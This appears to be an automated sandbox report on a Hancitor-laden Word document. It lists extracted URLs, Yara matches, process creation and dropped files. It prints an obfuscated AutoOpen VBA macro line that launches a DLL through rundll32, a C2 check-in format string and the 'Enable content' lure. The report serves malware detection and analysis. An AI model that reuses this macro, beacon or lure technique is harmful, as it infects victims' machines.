Source: rundll32.exe, 00000003.00000002.524132433.000000006F834000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000003.361304939.0000000002730000.00000040.00000001.sdmp String found in binary or memory: http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://api.aadrm.com/
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://api.diagnostics.office.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://api.office.net
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://api.onedrive.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://augloop.office.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://augloop.office.com/v2
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://autodiscover-s.outlook.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://cdn.entity.
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://clients.config.office.net/
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://config.edge.skype.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://cortana.ai
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://cr.office.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://devnull.onenote.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://directory.services.
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://graph.ppe.windows.net
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://graph.ppe.windows.net/
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://graph.windows.net
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://graph.windows.net/
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://incidents.diagnostics.office.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://lifecycle.office.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://login.microsoftonline.com/
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://login.windows.local
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://management.azure.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://management.azure.com/
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://messaging.office.com/
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://ncus-000.contentsync.
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://ncus-000.pagecontentsync.
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://officeapps.live.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://onedrive.live.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://onedrive.live.com/embed?
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://outlook.office.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://outlook.office365.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://powerlift-user.acompli.net
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://powerlift.acompli.net
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://settings.outlook.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://shell.suite.office.com:1443
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://skyapi.live.net/Activity/
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://store.office.cn/addinstemplate
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://store.office.com/addinstemplate
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://store.office.de/addinstemplate
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://tasks.office.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://templatelogging.office.com/client/log
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://web.microsoftstream.com/video/
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://wus2-000.contentsync.
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://wus2-000.pagecontentsync.
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://www.odwebp.svc.ms

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 3.2.rundll32.exe.6f830000.2.unpack, type: UNPACKEDPE Matched rule: Hancitor Payload Author: kevoreilly
Source: 3.2.rundll32.exe.6f830000.2.unpack, type: UNPACKEDPE Matched rule: Hancitor Payload Author: kevoreilly
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 8 Screenshot OCR: Enable content button from the yeuow bar above Page1 of 1 Owords It? O Type here to search m % -
Source: Screenshot number: 12 Screenshot OCR: Enable content button from the yeuow bar above Page1 of 1 Owords It? O Type here to search Ki E
Source: Screenshot number: 16 Screenshot OCR: Enable content button from the yeuow bar above Page1 of 1 Owords It? O Type here to search m % -
Source: Screenshot number: 20 Screenshot OCR: Enable content button from the yeuow bar above Page1 of 1 Owords It? O Type here to search m % -
Source: Screenshot number: 24 Screenshot OCR: Enable content button from the yeuow bar above Page1 of 1 Owords It? O Type here to search m % -
Source: Screenshot number: 8 Screenshot OCR: Enable content button from the yeuow bar above Page1 of 1 Owords It? O Type here to search m % -
Source: Screenshot number: 12 Screenshot OCR: Enable content button from the yeuow bar above Page1 of 1 Owords It? O Type here to search Ki E
Source: Screenshot number: 16 Screenshot OCR: Enable content button from the yeuow bar above Page1 of 1 Owords It? O Type here to search m % -
Source: Screenshot number: 20 Screenshot OCR: Enable content button from the yeuow bar above Page1 of 1 Owords It? O Type here to search m % -
Source: Screenshot number: 24 Screenshot OCR: Enable content button from the yeuow bar above Page1 of 1 Owords It? O Type here to search m % -
Document contains an embedded VBA macro which may execute processes
Source: 1118_8732615.doc OLE, VBA macro line: Call a.ShellExecute("rund" & "ll" & "32.exe", ActiveDocument.AttachedTemplate.Path & "\W0rd.dll,Start", " ", SW_SHOWNORMAL)
Source: 1118_8732615.doc OLE, VBA macro line: Call a.ShellExecute("rund" & "ll" & "32.exe", ActiveDocument.AttachedTemplate.Path & "\W0rd.dll,Start", " ", SW_SHOWNORMAL)
Document contains an embedded VBA macro with suspicious strings
Source: 1118_8732615.doc OLE, VBA macro line: Call a.ShellExecute("rund" & "ll" & "32.exe", ActiveDocument.AttachedTemplate.Path & "\W0rd.dll,Start", " ", SW_SHOWNORMAL)
Source: 1118_8732615.doc OLE, VBA macro line: Call a.ShellExecute("rund" & "ll" & "32.exe", ActiveDocument.AttachedTemplate.Path & "\W0rd.dll,Start", " ", SW_SHOWNORMAL)
Office process drops PE file
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\22.mp4 Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\22.mp4 Jump to dropped file
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F861DD9 3_2_6F861DD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F861DD9 3_2_6F861DD9
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: 1118_8732615.doc OLE, VBA macro line: Sub AutoOpen()
Source: 1118_8732615.doc OLE, VBA macro line: Sub AutoOpen()
Document contains embedded VBA macros
Source: 1118_8732615.doc OLE indicator, VBA macros: true
Source: 1118_8732615.doc OLE indicator, VBA macros: true
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: sfc.dll Jump to behavior
Yara signature match
Source: 3.2.rundll32.exe.6f830000.2.unpack, type: UNPACKEDPE Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: 3.2.rundll32.exe.6f830000.2.unpack, type: UNPACKEDPE Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: classification engine Classification label: mal100.troj.expl.evad.winDOC@7/21@3/3
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user~1\AppData\Local\Temp\{DF4A57E6-3BE8-48CB-B321-0BB0EAA5C19F} - OProcSessId.dat Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user~1\AppData\Local\Temp\{DF4A57E6-3BE8-48CB-B321-0BB0EAA5C19F} - OProcSessId.dat Jump to behavior
Source: 1118_8732615.doc OLE indicator, Word Document stream: true
Source: 1118_8732615.doc OLE indicator, Word Document stream: true
Source: 1118_8732615.doc OLE document summary: title field not present or empty
Source: 1118_8732615.doc OLE document summary: title field not present or empty
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Roaming\Microsoft\Templates\W0rd.dll,Start
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Roaming\Microsoft\Templates\W0rd.dll,Start
Source: 1118_8732615.doc Virustotal: Detection: 15%
Source: 1118_8732615.doc ReversingLabs: Detection: 12%
Source: 1118_8732615.doc Virustotal: Detection: 15%
Source: 1118_8732615.doc ReversingLabs: Detection: 12%
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Roaming\Microsoft\Templates\W0rd.dll,Start
Source: unknown Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288 Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Roaming\Microsoft\Templates\W0rd.dll,Start Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe Jump to behavior
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Roaming\Microsoft\Templates\W0rd.dll,Start
Source: unknown Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288 Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Roaming\Microsoft\Templates\W0rd.dll,Start Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Source: Binary string: c:\rockOne\Downmoney\tradeStart\gentle.pdb source: rundll32.exe, 00000003.00000002.524313023.000000006F86A000.00000002.00020000.sdmp, 1118_8732615.doc
